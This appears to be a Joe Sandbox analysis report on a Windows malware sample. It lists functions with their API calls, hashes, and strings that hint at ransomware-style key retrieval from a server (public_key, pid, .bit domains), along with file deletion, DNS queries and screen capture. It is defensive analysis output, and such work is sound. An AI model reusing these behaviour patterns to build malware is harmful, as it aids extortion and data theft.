                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EC32
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EC3E
                                                                                                        • lstrlenA.KERNEL32(","id":"), ref: 00F2EC51
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EC6D
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F2EC7F
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2EC93
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F2ECB3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2ED2A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F2ED4B
                                                                                                        • _malloc.LIBCMT ref: 00F2ED55
                                                                                                        • _memset.LIBCMT ref: 00F2ED63
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00F2ED7D
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2ED85
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EDA3
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F2EDAE
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F2EDD3
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F2EDF7
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F2EE05
                                                                                                        • _free.LIBCMT ref: 00F2EE15
                                                                                                        • _free.LIBCMT ref: 00F2EE22
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EF61
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F2EFBF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                        • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 704684250-3586605218
                                                                                                        • Opcode ID: fe531abdce3c8af28a3d05fe7623f5492ed44d86a089232700f1a025c8f79c27
                                                                                                        • Instruction ID: 4207fb255e77c5eeed980dc2708253155412c975dff45614a4fb41ed8462c74c
                                                                                                        • Opcode Fuzzy Hash: fe531abdce3c8af28a3d05fe7623f5492ed44d86a089232700f1a025c8f79c27
                                                                                                        • Instruction Fuzzy Hash: 15424671508351ABDB20EF24DC49B9BBBE8BF84314F14092DF48587292DB74E648DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1DD40 Relevance: 46.2, APIs: 22, Strings: 4, Instructions: 735stringnetworkmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcsstr.LIBCMT ref: 00F1DD8D
                                                                                                        • _wcsstr.LIBCMT ref: 00F1DDB6
                                                                                                        • _memset.LIBCMT ref: 00F1DDE4
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F1DE0A
                                                                                                        • gethostbyname.WS2_32(01010134), ref: 00F1DEA7
                                                                                                        • inet_ntoa.WS2_32(?), ref: 00F1DEC7
                                                                                                          • Part of subcall function 00F5F26C: std::exception::exception.LIBCMT ref: 00F5F27F
                                                                                                          • Part of subcall function 00F5F26C: __CxxThrowException@8.LIBCMT ref: 00F5F294
                                                                                                          • Part of subcall function 00F5F26C: std::exception::exception.LIBCMT ref: 00F5F2AD
                                                                                                          • Part of subcall function 00F5F26C: __CxxThrowException@8.LIBCMT ref: 00F5F2C2
                                                                                                          • Part of subcall function 00F5F26C: std::regex_error::regex_error.LIBCPMT ref: 00F5F2D4
                                                                                                          • Part of subcall function 00F5F26C: __CxxThrowException@8.LIBCMT ref: 00F5F2E2
                                                                                                          • Part of subcall function 00F5F26C: std::exception::exception.LIBCMT ref: 00F5F2FB
                                                                                                          • Part of subcall function 00F5F26C: __CxxThrowException@8.LIBCMT ref: 00F5F310
                                                                                                        • _memmove.LIBCMT ref: 00F1DF8C
                                                                                                        • _memmove.LIBCMT ref: 00F1DFFC
                                                                                                        • _wcsstr.LIBCMT ref: 00F1E06C
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008), ref: 00F1E07E
                                                                                                        • inet_addr.WS2_32(?), ref: 00F1E0C1
                                                                                                        • DnsQuery_W.DNSAPI(?,00000002,00000002,?,?,00000000), ref: 00F1E0E5
                                                                                                        • inet_ntoa.WS2_32(?), ref: 00F1E103
                                                                                                        • _memmove.LIBCMT ref: 00F1E33B
                                                                                                        • _memmove.LIBCMT ref: 00F1E40F
                                                                                                        • LocalFree.KERNEL32(?), ref: 00F1E495
                                                                                                        • DnsFree.DNSAPI(?,00000001), ref: 00F1E4A0
                                                                                                        • _memset.LIBCMT ref: 00F1E4BC
                                                                                                        • lstrcpyW.KERNEL32(?,http://), ref: 00F1E4D0
                                                                                                        • lstrcatW.KERNEL32(?,00000000), ref: 00F1E523
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F1E549
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F1E56A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw_memmove$_wcsstrlstrcatstd::exception::exception$FreeLocal_memsetinet_ntoa$AllocQuery_gethostbynameinet_addrlstrcpylstrlenstd::regex_error::regex_error
                                                                                                        • String ID: http://$https://$invalid string position$vector<T> too long
                                                                                                        • API String ID: 2428799424-3687932381
                                                                                                        • Opcode ID: 7ed3b4b9335279cf94f9955066be476ee45eaf868b9804897e672dfb08e7394e
                                                                                                        • Instruction ID: 5584373e556fee1576dbf39795fc2e0597fcbb6d51a65717c86965f719f8a470
                                                                                                        • Opcode Fuzzy Hash: 7ed3b4b9335279cf94f9955066be476ee45eaf868b9804897e672dfb08e7394e
                                                                                                        • Instruction Fuzzy Hash: 1452EF71E002199FCF28CF68CC947EEBBF1BF18314F188169E846AB241D7759A85DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F20FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00F21010
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F21026
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,?,0101793C,?,?,?,?,?,00F33B9C,?,0101793C,?,00000001), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F2103B
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F21051
                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00F21059
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00F21064
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F2107A
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00F21099
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F210AB
                                                                                                        • _memset.LIBCMT ref: 00F210CA
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F210DE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F210F0
                                                                                                        • _malloc.LIBCMT ref: 00F21100
                                                                                                        • _memset.LIBCMT ref: 00F2110B
                                                                                                        • _sprintf.LIBCMT ref: 00F2112E
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00F2113C
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F21154
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F2115F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 2451520719-213608013
                                                                                                        • Opcode ID: 25848e36505827efa5e74637b248e959261bce099ea9790cb5b86f1ec9ce6b57
                                                                                                        • Instruction ID: 4f4eb604ab3fcd41e926586b5c86bab999cb2c7e3d34c52e25dcb08080fb1254
                                                                                                        • Opcode Fuzzy Hash: 25848e36505827efa5e74637b248e959261bce099ea9790cb5b86f1ec9ce6b57
                                                                                                        • Instruction Fuzzy Hash: 61518E71D40219ABDB11DBA0DC46FEFBBB9FB04714F104026FA00F6280EB795A01ABA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32 ref: 00F21915
                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00F21932
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21941
                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21948
                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00F21956
                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00F21962
                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00F21974
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F2198B
                                                                                                        • lstrcatW.KERNEL32(00000000,01010260), ref: 00F21993
                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00F21999
                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F219A3
                                                                                                        • _memset.LIBCMT ref: 00F219B8
                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00F219DC
                                                                                                          • Part of subcall function 00F22BA0: lstrlenW.KERNEL32(?), ref: 00F22BC9
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00F21A01
                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00F21A04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                        • String ID: failed with error
                                                                                                        • API String ID: 4182478520-946485432
                                                                                                        • Opcode ID: 9dd7090e87a92cf451bfe62084ae467d0f807e520f4ccb49b1c2465df27a7aa2
                                                                                                        • Instruction ID: 350c1437f10f977c02b2b9c5ad1b9ae6f474780ac3937de60df7d3623d789dcc
                                                                                                        • Opcode Fuzzy Hash: 9dd7090e87a92cf451bfe62084ae467d0f807e520f4ccb49b1c2465df27a7aa2
                                                                                                        • Instruction Fuzzy Hash: 4D210732A4122DB7EB116BA09C4AFAE3B79EF85B11F100016FA05B6190DE781D41FBE5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21ACA
                                                                                                          • Part of subcall function 00F21AB0: DispatchMessageW.USER32(?), ref: 00F21AE0
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21AEE
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 00F1F900
                                                                                                        • _memmove.LIBCMT ref: 00F1F9EA
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00F1FA51
                                                                                                        • _memmove.LIBCMT ref: 00F1FADA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 273148273-0
                                                                                                        • Opcode ID: 7273d905322340cf584c4410e62f90e7a51b675983da602cda82693df08ee6b6
                                                                                                        • Instruction ID: 8f53c32379d78565d111c0f711e72b843c251801086cca80e8aed1b708f16a25
                                                                                                        • Opcode Fuzzy Hash: 7273d905322340cf584c4410e62f90e7a51b675983da602cda82693df08ee6b6
                                                                                                        • Instruction Fuzzy Hash: 8652DF71D00218DBDF10DFA8DC85BEEBBB4BF04318F108169E419A7251E779AA89DF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0100FCA4,00000000,00000000), ref: 00F1E8CE
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E8E4
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,?,0101793C,?,?,?,?,?,00F33B9C,?,0101793C,?,00000001), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1E8F9
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E90F
                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 00F1E928
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E93E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 00F1E95D
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E96F
                                                                                                        • _memset.LIBCMT ref: 00F1E98E
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F1E9A2
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1E9B4
                                                                                                        • _sprintf.LIBCMT ref: 00F1E9D3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1084002244-213608013
                                                                                                        • Opcode ID: a582bbb1aba563fe7a52590a068956ab473f3665e7104bcea074f544290074af
                                                                                                        • Instruction ID: 16a4efe6fb0f14cf6100e60de2b923045c20f32cb4ed2741543724dd51d707c1
                                                                                                        • Opcode Fuzzy Hash: a582bbb1aba563fe7a52590a068956ab473f3665e7104bcea074f544290074af
                                                                                                        • Instruction Fuzzy Hash: E6518071D40209ABDF11DFA0DC46FEEBBB9EB04714F10402AFA01B6181D779AA45EBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,0100FCA4,00000000), ref: 00F1EB01
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB17
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,?,0101793C,?,?,?,?,?,00F33B9C,?,0101793C,?,00000001), ref: 00F40F1F
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00F1EB2C
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB42
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 00F1EB4E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB64
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 00F1EB83
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EB95
                                                                                                        • _memset.LIBCMT ref: 00F1EBB4
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 00F1EBC8
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F1EBDA
                                                                                                        • _sprintf.LIBCMT ref: 00F1EBF4
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00F1EC44
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00F1EC4F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                        • String ID: %.2X
                                                                                                        • API String ID: 1637485200-213608013
                                                                                                        • Opcode ID: b12b6b86f3aa3b7987e36c074125e1c4f20e90e83612b3854f6f08df0c19cf24
                                                                                                        • Instruction ID: 5cd06d1a74f9279c372f32f22856cf4a39ee0d49a1b3346813bedd23dadfd69e
                                                                                                        • Opcode Fuzzy Hash: b12b6b86f3aa3b7987e36c074125e1c4f20e90e83612b3854f6f08df0c19cf24
                                                                                                        • Instruction Fuzzy Hash: EA518371E44209ABDF11DBA1DC46FEEBBB9EB44714F10402AFA01B6180D7796A05EBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F922E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F649A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00F64B72), ref: 00F649C7
                                                                                                          • Part of subcall function 00F649A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00F649D7
                                                                                                          • Part of subcall function 00F649A0: GetDesktopWindow.USER32 ref: 00F649FB
                                                                                                          • Part of subcall function 00F649A0: GetProcessWindowStation.USER32(?,00F64B72), ref: 00F64A01
                                                                                                          • Part of subcall function 00F649A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00F64B72), ref: 00F64A1C
                                                                                                          • Part of subcall function 00F649A0: GetLastError.KERNEL32(?,00F64B72), ref: 00F64A2A
                                                                                                          • Part of subcall function 00F649A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00F64B72), ref: 00F64A65
                                                                                                          • Part of subcall function 00F649A0: _wcsstr.LIBCMT ref: 00F64A8A
                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F92316
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F92323
                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F92338
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F92341
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00F9234E
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F9235C
                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00F9236E
                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00F923CA
                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00F923D6
                                                                                                        • SelectObject.GDI32(?,?), ref: 00F92436
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F9243D
                                                                                                        • DeleteDC.GDI32(?), ref: 00F9244A
                                                                                                        • DeleteDC.GDI32(?), ref: 00F92450
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                        • API String ID: 151064509-1805842116
                                                                                                        • Opcode ID: 684620563bc5b44aa0d83f42002806d38948cb47d6e6cd66d8aed70ec6dd0f52
